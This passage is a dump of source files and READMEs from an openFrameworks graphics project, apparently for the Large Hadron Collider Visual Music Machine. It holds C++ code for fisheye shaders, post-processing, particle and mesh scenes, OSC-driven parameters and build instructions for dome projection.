ofGetElapsedTimef() - lastElapsedTime;\n lastElapsedTime += deltaTime;\n\n fbo.begin();\n ofClear(255);\n ofSetColor(ofColor::white);\n ofPlanePrimitive plane;\n plane.set(w, h, 16+1, 16+1);\n plane.setPosition(w*.5, h*.5, 0);\n plane.drawWireframe();\n \n ofTranslate(w*0.5, h*0.5, 10);\n \n ofSetColor(ofColor::cyan);\n ofNoFill();\n ofSetLineWidth(3);\n\n growingRadius += deltaTime * cell * 2 * 0.5;\n if (growingRadius> cell*2)\n growingRadius = 0;\n for(int i=0;i<4;i++){\n float r = i*cell*2 + growingRadius;\n ofDrawCircle(0, 0, r);\n //ofDrawRectangle(-r,-r,r*2,r*2);\n }\n \n fbo.end();\n}\n\n//--------------------------------------------------------------\nvoid ofApp::draw(){\n \n float amount = 1;//ofClamp(ofGetMouseX() / (float)ofGetWidth(), 0.0, 1.0);//0.0-1.0\n \n\tif( doShader ){\n fisheye.begin(fbo.getTexture(), fbo.getWidth(), fbo.getHeight(), amount);\n }\n\t\n fbo.draw(0, 0, h, w);\n\t\t\n\tif( doShader ){\n\t\tfisheye.end();\n\t}\n \n //key commands----------\n string keys = \"'s': toggles shader\\n'1': Fisheye A shader\\n'2': Fisheye B shader\\n'3': Barrel Distortion shader\\nMouse X: fx amount\";\n ofDrawBitmapStringHighlight(keys, 10, 20);\n \n string info = \"fx amount: \" + ofToString(amount) +\n \"\\nCurrent FX type: \" + fisheye.getFxTypeAsString();\n ofDrawBitmapStringHighlight(info, 10, ofGetHeight()-50);\n \n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::keyPressed (int key){ \n\n switch (key) {\n case 's':\n doShader = !doShader;\n break;\n case '1':\n fisheye.setup(tFixFisheye);\n break;\n case '2':\n fisheye.setup(tVariableFisheye);\n break;\n case '3':\n fisheye.setup(tBarrelDist);\n break;\n \n \n default:\n break;\n }\n}\n\n//--------------------------------------------------------------\nvoid ofApp::keyReleased(int key){ \n\t\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseMoved(int x, int y ){\n\t\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseDragged(int x, int y, int button){\n\t\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mousePressed(int x, int y, int button){\n\t\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseReleased(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseEntered(int x, int y){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseExited(int x, int y){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::windowResized(int w, int h){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::gotMessage(ofMessage msg){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::dragEvent(ofDragInfo dragInfo){ \n\n}\n\n" }, { "alpha_fraction": 0.595652163028717, "alphanum_fraction": 0.6020793914794922, "avg_line_length": 21.60683822631836, "blob_id": "de3c7b3ea36e130112cb2b7ef904629a7ea5a5b7", "content_id": "19c81a388c56841f30c3e792da78bada1e600973", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5290, "license_type": "no_license", "max_line_length": 108, "num_lines": 234, "path": "/Graphics/apps/videoTest_3/src/cubeMesh/EntropicaApp.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n//Addons\n\n#include \"ofxGui.h\"\n#include \"ofxMarchingCubes.h\"\n#include \"ofxTimeMeasurements.h\"\n#include \"ofxAnimatableFloat.h\"\n\n\n//Common classes\n#include \"DisplacementSphereMesh.h\"\n#include \"BaseMeiApp.h\"\n\n#include \"Colors.h\"\n#include \"EnumsAndDefines.h\"\n\n\n\n//*********************************\n\n\nclass EntropicaApp : public BaseMeiApp{\n \npublic:\n \n ~EntropicaApp(){exit();}\n \n //OF Core funcs\n void setup(ofFbo* iFbo, OscManager* iOsc);\n void update();\n void exit();\n \n void keyPressed(int key);\n \n //Scene funcs\n void drawScene();\n void drawGui();\n \n //Gui funcs\n void setControlGui();\n \n //String funcs\n \n string getInfoString();\n string getHelpString();\n string getMarkerString();\n string getInfoForAnalyzerString();\n \n void setFboPtr(ofFbo* iFbo){fbo = iFbo;}\n void setOscPtr(OscManager* iOsc){osc = iOsc;}\n void setPostProcessing(bool val){bPostProcessing = val;}\n\n //Flow control\n void setScene(Mark iMarker, int iSubmarker);\n void setScene(int gralMarker);\n\n \n //Common funcs\n void setupPostProcessing(int w, int h);\n\n float trans(float fromVal, float toVal, float trans){\n return (1-trans)*fromVal + trans*toVal;\n }\n \n\n\n \n ofMaterial material;\n ofLight light;\n ofColor mainColor, backgroundColor;\n \n ofEasyCam eCam;\n ofCamera fxdCam;\n bool bUseFixCam;\n float camCounter;\n \n Mark _marker;\n int _subMarker;\n int _gralMarker;\n float _animDuration, _animCamDuration;\n ofxAnimatableFloat animValue, animValueCam;\n \n \n //Booleans---------------\n bool bShowGui;\n \n bool bPostProcessing;\n\n //bool bKeyCommands;\n ofxToggle bReceiveOSCGui, bDoShaderGui;\n bool bDoDisplacement, bDoMetaball, bDoMarching, bDoFaces,bDoNoiseShader, bDoCubeMesh, bDoFaceSh;\n\n //Shaders----------------\n ofShader noiseShader;\n ofShader faceShader;\n ofShader cubeShader;\n ofShader phongSahder;\n //Displacement-sphere-------\n DisplacementSphereMesh displacement;\n int dispResolution;\n vector<ofMeshFace> triangles;\n ofSpherePrimitive sphereDistor;\n //Cubes-sphere----------------\n ofSpherePrimitive sphereCubes;\n ofMesh cubeMesh;\n //False-Metaballs--------------\n float metaTr_1, metaTr_2;\n int metaScale_1, metaScale_2;\n vector<ofVec3f> centers_1, centers_2;\n //MarchingCubes--------------\n ofxMarchingCubes mc;\n \n \n \n //----------------------------------------\n\n \n// DofPass::Ptr dof;\n// GodRaysPass::Ptr godRays;\n// LimbDarkeningPass::Ptr limbDarkening;\n// SSAOPass::Ptr ssao;\n \n //syphon\n\n\n \n //GUI-----------------\n\t//ofxPanel gui;\n \n ofxToggle bDoDisplacementGui, bDoMetaballGui, bDoMarchingGui, bDoFacesGui, bDoCubeMeshGui, bDrawAxisGui;\n ofxFloatSlider velGui;\n ofxFloatSlider volumeGui;\n ofxFloatSlider xGui, yGui;\n ofxFloatSlider radiusGui;\n ofxIntSlider resolGui;\n ofxToggle bWireGui;\n ofxToggle bLitGui;\n ofxFloatSlider strengthGui, angleGui;\n ofxIntSlider cubeScaleGui;\n ofxFloatSlider minRadiusGui, maxRadiusGui;\n ofxFloatSlider metaVelGui, metaDistOrbGui;\n ofxFloatSlider marchNoise1Gui, marchNoise2Gui, marchStepGui;\n ofxIntSlider marchRadiusGui;\n ofxFloatSlider faceNoiseGui;\n ofxLabel lDisp, lMeta, lMarch, lCubeShader;\n ofxFloatSlider xShGui, yShGui;\n ofxFloatSlider volumeShGui;\n ofxFloatSlider velShGui;\n ofxFloatSlider sizeShGui;\n ofxIntSlider radiusShGui;\n\n \n //MappingParameters-----------\n //for one object\n float power;\n float centroid;\n float specComp;\n float specCompB;\n float pitchConf;\n float pitchFreq;\n float confTresh;\n float hfc;\n //for split objects\n float specComp1, specComp2;\n float centroid1, centroid2;\n float power1, power2;\n float pitchFreq1, pitchFreq2;\n float pitchConf1, pitchConf2;\n float hfc1, hfc2;\n //for cubeMesh\n float cubeX, cubeY;\n float cubeVol;\n float cubeSize;\n int cubeRadius;\n float cubeVel;\n //\n float marchShX, marchShY;\n float marchShVol;\n float marchShSize;\n int marchRadius;\n float marchShVel;\n //-\n float dispNzAmnt;\n //-Meta\n float metaShX_1, metaShX_2;\n float metaShY_1, metaShY_2;\n float metaShVel_1, metaShVel_2;\n float metaShVol_1, metaShVol_2;\n //-\n float metaVel_1, metaVel_2;\n float minRadius, metaMaxRadius_1, metaMaxRadius_2;\n \n //syphonControl\n ofxOscReceiver receiverSyph;\n ofxOscSender senderSyph;\n string serversList;\n string clientInfo;\n \n //-------------------\n string boolToString (bool b){\n string s;\n if(b)s = \"TRUE\";\n else s = \"false\";\n return s;\n }\n \n string markerToString (Mark iMarker){\n string s;\n switch (iMarker) {\n case A:\n s=\"A\";\n break;\n case B:\n s=\"B\";\n break;\n case C:\n s=\"C\";\n break;\n case D:\n s=\"D\";\n break;\n case Z:\n s=\"Z\";\n break;\n \n default:\n break;\n }\n return s;\n }\n\n};\n" }, { "alpha_fraction": 0.640838623046875, "alphanum_fraction": 0.640838623046875, "avg_line_length": 18.96363639831543, "blob_id": "46ff5293c1abf06cf302cb502b4ce23ab2f06d2b", "content_id": "e6b05014356910e3376b0f34cb4bd676ad3eb2ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1097, "license_type": "no_license", "max_line_length": 56, "num_lines": 55, "path": "/Graphics/apps/videoTest_3/src/PostProcessingManager.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n#include \"ofxPostProcessing.h\"\n#include \"ofxGui.h\"\n\nclass PostProcessingManager{\n\npublic:\n \n void setup(int w, int h);\n \n void updateValues();\n \n void drawGui(int x, int y);\n void setupGui();\n \n void begin();\n void begin(ofCamera& cam);\n void begin(ofCamera& cam, ofRectangle viewport);\n \n \n void end();\n \n\n \n \nprivate:\n \n ofxPostProcessing post;\n DofPass::Ptr dof;\n GodRaysPass::Ptr godRays;\n LimbDarkeningPass::Ptr limbDarkening;\n SSAOPass::Ptr ssao;\n \n //gui------------------------------------------\n \n ofxPanel gui;\n \n ofxToggle gDoFxaa;\n ofxToggle gDoBloom;\n ofxToggle gDoDof;\n ofxToggle gDoKaleidoscope;\n ofxToggle gDoNoiseWarp;\n ofxToggle gDoPixelate;\n ofxToggle gDoEdgePass;\n ofxToggle gDoVerticalTiltShift;\n ofxToggle gDoGodRays;\n ofxToggle gDoLimbDarkening;\n ofxToggle gDoSsao;\n \n ofxFloatSlider gDofAperture, gDofMaxBlur, gDofFocus;\n ofxFloatSlider gGodRaysLightDotView;\n ofxFloatSlider gSsaoAoClamp, gSsaoLumInfluence;\n};" }, { "alpha_fraction": 0.7679415345191956, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 41.30908966064453, "blob_id": "16bcb6c06be84769e742587e78ac9d1d0ec9477a", "content_id": "dbc1c5de3bc4dc19ea3a531d9b3fd5a4b784690f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2331, "license_type": "no_license", "max_line_length": 227, "num_lines": 55, "path": "/Graphics/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "# lhcvmm\nLarge Hadron Collider Visual Music Machine - Graphics Engine\n\n# Directory structure\n\n* addons: openFrameworks addons (www.ofxaddons.com) used in this project. Some are addons developed by Opensemble specifically for the LHCVMM, and some were forked from their original repositories.\n\n* common_classes: Classes for general purpose common tasks.\n\n* examples: Simple projects for testing and exemplify the use of the tools developed for the LHCVMM’s Graphics Engine.\n\n* apps: Complex apps that are part of the LHCVMM’s Graphics Engine.\n\n# Compilation\n\nThe Graphics Engine of the LHCVMM is developed using openFrameworks v0.9.0 (www.openFrameworks.com). To compile the examples in this repository you need to clone lhcvmm main directory into OF apps dir (OF_ROOT_DIR/apps/lhcvmm).\n\n### OSX\nIn OS X projects can be compiled using the Xcode projects or using the Makefiles by Terminal.\n\n### Linux\nProjects can be compiled using the Makefiles by Terminal.\n\n# Creating a New Project\n### Path\nThe project must be placed either into examples/ or apps/ directories.\n\n### Makefile\nThe OF root directory must be: OF_ROOT=$(realpath ../../../../..)\n\n### config.make\nYou need to add these lines to link the local addons and common_classes folders:\nPROJECT_EXTERNAL_SOURCE_PATHS = ../../common_classes\nPROJECT_EXTERNAL_SOURCE_PATHS += ../../addons\n\n### Xcode project\n- Project.xconfig: OF_PATH = ../../../../..\n- Add files to project: OF_ROOT/libs/openFrameworksCompiled/project/osx/CoreOF.xconfig && openFrameworksLib.xcodeproj\n- Build Phases -> Target Dependencies: openFrameworksLib\n- Link Binary With Libraries: openFrameworksDebug.a\n- Run Script: Change to \"../../../../..\"\n\n### emptyExample\nThe simplest way to create a new project is to copy the examples/emptyExample project. This project has a ready to compile Xcode project and the Makefile and config.make already configured.\n\n### addons\nAll addons used in the LHCVMM must be placed into lhcvmm/Graphics/addons. Apps and examples projects must link the addons to this path.\naddons.make file must always be blank to avoid references to OF_ROOT/addons.\n\n### Documentation\nAll projects must include a README.md file with the following info:\n* TITLE\n* Description\n* Dependencies (all dependencies must be included in the lhcvmm/Graphics repository)\n* Compilation instructions.\n" }, { "alpha_fraction": 0.620574951171875, "alphanum_fraction": 0.6291280388832092, "avg_line_length": 20.808290481567383, "blob_id": "30d3179ada8de5caec1bedacd305e20f0fb78d9f", "content_id": "62e002c919b2d6672ed9c96892e660c26a69bc32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4209, "license_type": "no_license", "max_line_length": 107, "num_lines": 193, "path": "/Graphics/apps/final/src/ofApp.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n#include \"ofxGui.h\"\n\n#include \"PostProcessingManager.h\"\n\n#include \"instancedManager.h\"\n#include \"SphereManager.h\"\n\n#include \"ParticleSystemPair.h\"\n#include \"GuiManager.h\"\n\n#include \"ofxOsc.h\"\n#include \"ofxXmlSettings.h\"\n\n#include \"ofxFisheye.h\"\n#include \"VideoRenderer.h\"\n\n\n// listen on port 12345\n#define PORT 12345\n\n#define FRAME_RATE 30\n\n//--------------------------------\n//COLORS\n//#define COLOR_SPHERE ofColor::orange\n//#define COLOR_INSTANCED ofColor::violet\n//#define COLOR_PARTICLES ofColor::cyan\n\n#define COLOR_SPHERE ofColor::orange\n#define COLOR_PARTICLES ofColor::white\n#define COLOR_INSTANCED ofColor::violet\n\n\n#define MAX_LIGHT_X 1024\n#define MAX_LIGHT_Y 800\n#define MAX_LIGHT_Z 800\n//-------------------------------\n#define MTR_NAME_POWER \"POWER\"\n#define MTR_NAME_PITCH_FREQ \"FREQ\"\n#define MTR_NAME_PITCH_CONF \"CONFID\"\n#define MTR_NAME_PITCH_SALIENCE \"SALIENCE\"\n#define MTR_NAME_HFC \"HFC\"\n#define MTR_NAME_CENTROID \"CENTROID\"\n#define MTR_NAME_SPEC_COMP \"SPEC-COMP\"\n#define MTR_NAME_INHARMONICTY \"INHARM\"\n#define MTR_NAME_SPECTRUM \"SPECTRUM\"\n#define MTR_NAME_MEL_BANDS \"MEL-BANDS\"\n#define MTR_NAME_MFCC \"MFCC\"\n#define MTR_NAME_HPCP \"HPCP\"\n#define MTR_NAME_ONSETS \"ONSETS\"\n#define MTR_SMOOTHING \"SMOOTH\"\n#define MTR_ON_OFF \"ON\"\n//--------------------------------\n\nclass ofApp : public ofBaseApp{\n\t\npublic:\n\t\t\n\tvoid setup();\n\tvoid update();\n\tvoid draw();\n \n void updatePair();\n void updateSphere();\n void updateInstanced();\n \n void drawFboInstanced();\n void drawFboParticles();\n void drawFboSphere();\n void drawFboMain();\n void drawFboPost();\n \n void drawDomeLimits(int w, int h);\n \n void keyPressed(int key);\n \n void setupGui();\n void resetCamera();\n \n void receiveOsc();\n void updateOscFromDataFile(int frameNum);\n \n void triggerOnset();\n \n //---------------------\n void startAnimation();\n void stopAnimation();\n\n \n //gui----\n bool bShowGuiInstanced;\n bool bShowGuiPair;\n bool bShowGuiCubeSphere;\n \n \n \n ofEasyCam cam;\n ofLight light;\n \n InstancedManager instanced;\n \n ofFbo drawFbo; //FBO for drawing scene, wihtout fisheye\n \n \n int fw, fh;\n \n \n //pair particles\n ParticleSystemPair pair;\n GuiManager guiPair;\n //parameters to change in scenes\n float minVelX, maxVelX;\n float minRadius;\n float maxRadius;//radiusInit, radiusVar\n float maxPartSize;\n float maxAngleVar;\n \nprivate:\n \n ofxOscReceiver receiver;\n \n float oscSphereValue1;\n float oscSphereValue2;\n float oscSphereValue3;\n float oscPartsValue1;\n float oscPartsValue2;\n float oscPartsValue3;\n float oscInstValue1;\n float oscInstValue2;\n \n \n\n //-----------------------\n \n ofVec3f _center;\n \n //-----------------\n ofFbo fboInstanced;\n ofFbo fboParticles;\n ofFbo fboSphere;\n \n ofFbo fboPost;\n \n //-------------------\n PostProcessingManager postManager;\n\n ofxPanel guiMain;\n ofxToggle gDoPostProcessing;\n ofxToggle gReceiveOSC;\n ofxToggle gDoDrawInstanced;\n ofxToggle gDoDrawSphere;\n ofxToggle gDoDrawParts;\n ofxToggle gDoDrawDomeLimits;\n ofxVec3Slider gLightPos;\n ofxFloatSlider gFisheye;\n ofxIntSlider gFramePlayer;\n \n ofxToggle gUseCam;\n ofxToggle gAxis;\n ofxToggle gUseLight;\n\n SphereManager sphere;\n\n //----------------------\n \n ofxXmlSettings data;\n \n //renderer-----------------\n //commo render vars****************************************\n \n //animation data variables----------------\n bool isAnimating;\n int frameCounter;//animation Frame Counter\n //float frameDuration;//Duration in seconds of each frame\n int framesMaxNumber;//Number of frames of the entire animation\n float animValue;//Current frame in relationship with the duration of the entire animation (0.0 - 1.0)\n float animationTime;\n \n int lastFrameWithOnset;\n //----------------------------\n ofxFisheye fisheye;\n float fisheyeAmount;\n \n VideoRenderer renderer;\n \n //ofFbo drawFbo; //FBO for drawing scene, wihtout fisheye\n \n ofTrueTypeFont\tverdana;\n\n};\n" }, { "alpha_fraction": 0.6056782603263855, "alphanum_fraction": 0.6561514139175415, "avg_line_length": 32.78571319580078, "blob_id": "3fffb94058af2fe92ee2525d6c05208497f453a6", "content_id": "74da4ba9e8d34ff595ba6444a3b04459c61dcd56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 951, "license_type": "no_license", "max_line_length": 49, "num_lines": 28, "path": "/Graphics/apps/final/src/particleSystem/BosqueConstants.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n//Keys macros\n#define KEY_DIST_TRESHOLD \"distTreshold\"\n#define KEY_PARTS_NUM \"partsNum\"\n#define KEY_PARTS_RATE \"partsRate\"\n#define KEY_X_VELOCITY \"xVelocity\"\n#define KEY_X_NZ_AMP \"xNzAmp\"\n#define KEY_X_NZ_FREQ \"xNzFreq\"\n#define KEY_RADIUS_INIT \"radiusInit\"\n#define KEY_RADIUS_VAR \"radiusVar\"\n#define KEY_RADIUS_NZ_AMP \"radiusNzAmp\"\n#define KEY_RADIUS_NZ_FREQ \"radiusNzFreq\"\n#define KEY_ANGLE_INIT \"angleInit\"\n#define KEY_ANGLE_VAR \"angleVar\"\n#define KEY_ANGLE_NZ_AMP \"angleNzAmp\"\n#define KEY_ANGLE_NZ_FREQ \"angleNzFreq\"\n#define KEY_PART_SIZE \"partSize\"\n\n//Colors\n\n//#define COLOR_IN_A ofColor(99,162,152)\n//#define COLOR_IN_B ofColor(99,162,152)\n//#define COLOR_IN_UNION ofColor(99,162,152)\n//\n//#define COLOR_OUT_A ofColor(162,97,107)\n//#define COLOR_OUT_B ofColor(162,97,107)\n//#define COLOR_OUT_UNION ofColor(162,97,107)\n\n\n\n\n\n" }, { "alpha_fraction": 0.6051872968673706, "alphanum_fraction": 0.6138328313827515, "avg_line_length": 19.799999237060547, "blob_id": "aab409e8524f9978bbde29d779c2d1bb8d922ad4", "content_id": "e3c01ba0f0663368b96550ec47f0111cd1ff6a11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1041, "license_type": "no_license", "max_line_length": 116, "num_lines": 50, "path": "/Graphics/addons/ofxFisheye/src/ofxFisheye.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "/*\nofxFisheye is an addon based on:\nhttp://www.geeks3d.com/20140213/glsl-shader-library-fish-eye-and-dome-and-barrel-distortion-post-processing-filters/\n */\n#pragma once\n\n#include \"ofMain.h\"\n\n#include \"fxFixFisheye.h\"\n#include \"fxBarrelDist.h\"\n#include \"fxVariableFisheye.h\"\n\n\nenum fxType{\n tFixFisheye,\n tBarrelDist,\n tVariableFisheye\n};\n\nclass ofxFisheye{\n \n public:\n \n void setup(fxType type);\n void draw();\n void update();\n void exit();\n \n void begin(ofTexture& fboTexture, int w, int h, float amount);\n void end();\n \n void setFxType(fxType type);\n fxType getFxType(){return currentFxType;}\n string getFxTypeAsString();\n \n private:\n \n fxType currentFxType;\n \n ofShader fixFishShader;\n ofShader barrelShader;\n ofShader varFishShader;\n \n ofShader* currentShader;\n \n fxFixFisheye fixFisheye;\n fxBarrelDist barrelDist;\n fxVariableFisheye varFisheye;\n\n};\n\n" }, { "alpha_fraction": 0.7845467925071716, "alphanum_fraction": 0.7994056344032288, "avg_line_length": 38.588233947753906, "blob_id": "9b54f8c0af43573e6ca7ed8154ba0e07c214a890", "content_id": "eb9db5353aea035ce104411111e3b84ae9723ca4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 675, "license_type": "no_license", "max_line_length": 234, "num_lines": 17, "path": "/Graphics/apps/videoTest_2/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#2nd Video Test for BA Planetarium \n\n###Description\n45” video sample for testing the BA Planetarium Full Dome projection system. It uses instanced rendering with Linear, Concentric and Rotating motion and Fisheye Fx filters. \n\n\n###Dependencies\n* ofxTimeline addon (https://github.com/YCAMInterlab/ofxTimeline)\ncommit: 0ad5b9ee92\n* addons: ofxVideoRecorder, ofxFisheye\n* common_classes: VideoRenderer, ImageSaverThread\n\n\n\n\n### Compilation\nThe Graphics Engine of the LHCVMM is developed using openFrameworks v0.9 (www.openFrameworks.com). To compile the examples in this repository you need to clone lhcvmm main directory into OF apps dir (OF_ROOT_DIR/apps/lhcvmm/Graphics/)\n" }, { "alpha_fraction": 0.5167464017868042, "alphanum_fraction": 0.5528156161308289, "avg_line_length": 25.115385055541992, "blob_id": "3ab77e54d8bea188baa409f834677b925c7f0f1c", "content_id": "58618df212834deaf761be39888e67b7636fd496", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2717, "license_type": "no_license", "max_line_length": 131, "num_lines": 104, "path": "/Graphics/apps/videoTest_3/src/SphereManager.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#include \"SphereManager.h\"\n\nvoid SphereManager::setup(){\n \n displacement.setup();\n dispResolution = 96;\n \n faceShader.setGeometryInputType(GL_TRIANGLE_STRIP);\n faceShader.setGeometryOutputType(GL_TRIANGLE_STRIP);\n faceShader.setGeometryOutputCount(3);\n faceShader.load(\"entropica/shaders/faces/vert.glsl\", \"entropica/shaders/faces/frag.glsl\", \"entropica/shaders/faces/geom.glsl\");\n \n phongShader.load(\"entropica/shaders/phong/phong.vert\",\"entropica/shaders/phong/phong.frag\" );\n \n //--------------\n _mainColor = ofColor::white;\n material.setShininess(110.0);\n material.setDiffuseColor(_mainColor);\n \n setupGui();\n \n\n}\n//----------------------------------\nvoid SphereManager::update(){\n \n //---------------------------------\n float x, y, vol, rad, res, vel;\n \n float centroid = 0.5;\n float specComp = 0.5;\n \n x = centroid*.1;\n y = .001 + specComp*.049;\n vol = 0.5+centroid*0.1;\n rad = 30+specComp*100;\n res = dispResolution;\n vel = 1;\n \n dispNzAmnt =strengthGui;\n \n displacement.update(xGui, yGui, volumeGui, radiusGui, resolGui, ofGetFrameNum()*velGui);\n\n\n}\n//----------------------------------\nvoid SphereManager::drawScene(){\n \n material.begin();\n \n if (bDoFaceSh) {\n faceShader.begin();\n faceShader.setUniform1f(\"timeVal\", ofGetFrameNum());\n faceShader.setUniform1f(\"noiseAmnt\", dispNzAmnt);\n }else{\n phongShader.begin();\n }\n \n ofPushMatrix();\n ofTranslate(_pos.x, _pos.y, zPos);\n ofRotateX(180.0);\n \n \n bDoFaces ? sphereDistor.draw() : displacement.mainMesh.draw();\n \n \n ofPopMatrix();\n \n \n if (bDoFaceSh){\n faceShader.end();\n }else{\n phongShader.end();\n }\n \n material.end();\n\n \n}\n//----------------------------------\nvoid SphereManager::setupGui(){\n \n //cubeSphere------------\n gui.setup(\"sphere\");\n gui.setPosition(200,300);\n gui.add(velGui.setup( \"Velocity\", 1, 0, 5 ));\n gui.add(volumeGui.setup( \"Volume\", 0.185, 0, 1 ));\n gui.add(xGui.setup( \"X\", 0.0815, 0, 0.1 ));\n gui.add(yGui.setup( \"Y\", 0.06, 0, 0.1 ));\n gui.add(radiusGui.setup( \"Radius\", 97, 0, 500 ));\n gui.add(resolGui.setup( \"Resolution\", 96, 1, 100 ));\n gui.add(strengthGui.setup( \"Strength\", -25, -200, 200 ));\n gui.add(faceNoiseGui.setup( \"FaceNoise\", 20., 0., 20.));\n gui.add(zPos.setup( \"Z pos\", 0.0, -300.0, 300.0));\n}\n//----------------------------------\nvoid SphereManager::drawGui(){\n gui.draw();\n}\n//----------------------------------\nvoid SphereManager::setColor(ofColor col){\n _mainColor = col;\n material.setDiffuseColor(_mainColor);//??? es diffuse el que va?\n}\n" }, { "alpha_fraction": 0.5561398267745972, "alphanum_fraction": 0.59201979637146, "avg_line_length": 28.502283096313477, "blob_id": "1e7b7a762f8b04dfd9c0690d7d73dada922a89d2", "content_id": "122cbadbab2f7c3bf1453a5cde7100780f57efc1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6466, "license_type": "no_license", "max_line_length": 105, "num_lines": 219, "path": "/Graphics/apps/final/src/instanced/instancedManager.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n\n#include \"instancedManager.h\"\n\nvoid InstancedManager::setup(int fboWidth){\n \n _fboWidth = fboWidth;\n \n ofBoxPrimitive tmpBox;\n\ttmpBox.set(1.0);// set the size\n\tvboMesh = tmpBox.getMesh();\n \n \tshaderInst.load(\"shadersGL2/instanced.vert\", \"shadersGL2/instanced.frag\");\n \n _mode = LINEAL;\n _hRes = 40;\n _vRes = 20;\n _width = 100;\n _height = 30;\n \n Orient.set(1,1,1);\n yPos = 0.0;\n bDoQuilombo =false;\n velX=1.0;\n \n zPos = 0.0;\n \n velCounter = 1;\n \n maskRadius = 0.0;\n \n //material--\n material.setShininess( 100 ); // shininess is a value between 0 - 128, 128 being the most shiny //\n material.setSpecularColor(ofColor(255.f, 255.f, 255.f, 255.f));\n material.setDiffuseColor(mainColor);\n \n //-------------------\n setupGui();//mandatory\n}\n\n\n//--------------------------------------\nvoid InstancedManager::update(){\n \n int w = _fboWidth;\n \n //update instancedManager values\n if(!gMode)setMode(LINEAL);\n else if(gMode && !gRadMode) setMode(RAD_CONCENTRIC);\n else if(gMode && gRadMode){\n setMode(RAD_CENTRIFUGE);\n setRadDeform(gRadDeform);\n }\n \n setWidth(gWidth);\n setHeight(gHeight);\n setCubeSize(gCubesizeUnified * MAX_CUBESIZE*w);\n \n setMaskRadius(gMaskRadius);\n setHres(gHres * MAX_H_RES);\n setVres(gVres * MAX_V_RES);\n setVelocity(gVelocity * MAX_VELOCITY);\n setXpos(gXpos);\n setYpos(gYpos);\n setZpos(gZpos);\n //nz\n setNzTime(gNzTime * MAX_NZ_TIME);\n \n setXnzAmp(gNzXAmp * MAX_NZ_AMP*w);\n setXnzFreq(gNzXFreq * MAX_NZ_FREQ);\n setXnzRug(gNzXRug * MAX_NZ_RUG*w);\n \n setYnzAmp(gNzYAmp * MAX_NZ_AMP*w);\n setYnzFreq(gNzYFreq * MAX_NZ_FREQ);\n setYnzRug(gNzYRug * MAX_NZ_RUG*w);\n \n setZnzAmp(gNzZAmp * MAX_NZ_AMP*w);\n setZnzFreq(gNzZFreq * MAX_NZ_FREQ);\n setZnzRug(gNzZRug * MAX_NZ_RUG*w);\n\n}\n//--------------------------------------\nvoid InstancedManager::drawScene(){\n \n\n\n material.begin();\n \n ofPushStyle();\n\tofSetColor(mainColor);\n \n ofPushMatrix();\n \n //set XYZ-----------------------\n \n //lineal\n if(_mode==LINEAL && _vRes>1)\n ofTranslate(xPos*Lim.x, _height*(-.5) + (yPos*Lim.y), zPos);\n //radial\n else if(_mode!=LINEAL && _vRes>1)\n ofTranslate(xPos*Lim.x, Lim.y*(.5) + (yPos*Lim.y),zPos);\n \n \n if(Orient.x<0){\n ofRotateY(180);\n ofTranslate(Lim.x*Orient.x, 0);\n }\n //-----------------------------------\n //Set Shader uniforms\n //---------------------------------------\n\tshaderInst.begin();\n if (_mode == LINEAL)\n shaderInst.setUniform1i(\"uMode\", 0);\n else if(_mode == RAD_CONCENTRIC)\n shaderInst.setUniform1i(\"uMode\", 1);\n else if(_mode == RAD_CENTRIFUGE)\n shaderInst.setUniform1i(\"uMode\", 2);\n \n shaderInst.setUniform1f(\"uDeformRad\", radDeform);\n \n\tshaderInst.setUniform1i(\"uHres\", _hRes);\n shaderInst.setUniform1i(\"uWidth\", _width);\n shaderInst.setUniform1i(\"uVres\", _vRes);\n shaderInst.setUniform1i(\"uHeight\", _height);\n shaderInst.setUniform1f(\"uMaskRadius\", maskRadius);\n \n\tshaderInst.setUniform1f(\"timeValue\", (velCounter% 3000) / 3000.0f);\n //shaderInst.setUniform1f(\"timeValue_b\", ofGetElapsedTimeMillis()); //time dependant\n shaderInst.setUniform1f(\"timeValue_b\", velCounter*10.0); //frame dependant\n \n shaderInst.setUniform1f(\"uTimeNoise\", noiseTime);\n \n shaderInst.setUniform1f(\"uXnoiseFreq\", xNoiseFreq);\n shaderInst.setUniform1f(\"uXnoiseAmp\", xNoiseAmp*Orient.x);\n shaderInst.setUniform1f(\"uXnoiseRug\", xNoiseRug);\n \n shaderInst.setUniform1f(\"uYnoiseFreq\", yNoiseFreq);\n shaderInst.setUniform1f(\"uYnoiseAmp\", 